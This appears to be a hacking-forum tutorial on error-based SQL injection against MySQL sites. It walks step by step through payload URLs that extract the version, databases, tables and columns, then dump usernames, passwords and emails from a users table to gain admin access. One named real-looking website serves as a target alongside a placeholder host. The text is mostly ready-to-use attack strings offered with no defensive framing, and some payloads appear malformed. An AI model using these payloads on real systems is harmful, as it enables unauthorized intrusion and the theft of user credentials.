http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+[code]
[spoiler][img]http://img830.imageshack.us/img830/2218/81406053.png[/img]

Notice: We dont have to use this hex

Code:
0x7e,0x27
We can use the syntax without them and our code like this


Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

It work fine but there is another problem you should know it.When we erase the hex value from code result of it like

[Image: 24262231.png]

As you see we have foregner "1" near version name and it will stay for all our results thus it maybe get confuse some one whoe new start this type of injection.
In this tutorial I write all syntax with hex value.

[color=#800]Tip:[/color]If our targer use version 4 and lower than it we can use this syntax for getting version and database name look at this


Code:
http://www.kusuri.co.uk/view_product.php?id=242 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

[Image: version4l.png]
Dont worry
There is another code for this type of site you can find version and database and user of site the code is like this


Code:
or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or

Now trying this in site

Code:
http://www.kusuri.co.uk/view_product.php?id=242 or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or 1--+
[Image: ve4.png]

As you see in the pic version 4 and we can success to find it

Now we have have version and database and move on to inject our target
[Image: 13063360.png]

For extact how many database exist in site we to use another syntax like this one

Code:
and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Check results for our target

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: 87804024jb.png]

Now with useing this code and replacing in limit we can find all DB

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

With replece in first limit we can get all requests from DB like this
Code:
limit 0,1   for first exicting things
limit 1,1  for two exicting things
  .
  .
  .  
limit N,1  for N exicting things


For getting tables from database I use this " table_schema=0x{hex-database-name} "
First take a look our picked DB have how many tables?

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name} 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: nober.png]

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name} 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: tabeo.png]

By giveing a number for firs limit all table are count
I find table name " mass_users " And now we should exratct column name of this table to get gain admin access.

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: 21094341.png]

Only have five columns lets get it

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[img]img209.imageshack.us/img209/949/userb.png[/img]
[Image: passy.png]

All column are here
Code:
id,username,password,firstname,email

Last step extract the value of this columns

Code:
http://www.site.com/artist.php?i=36' and+(select 1 from(select+count(*),concat((select+concat(username,0x3a,password,0x3a,email) from mass_users+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1--+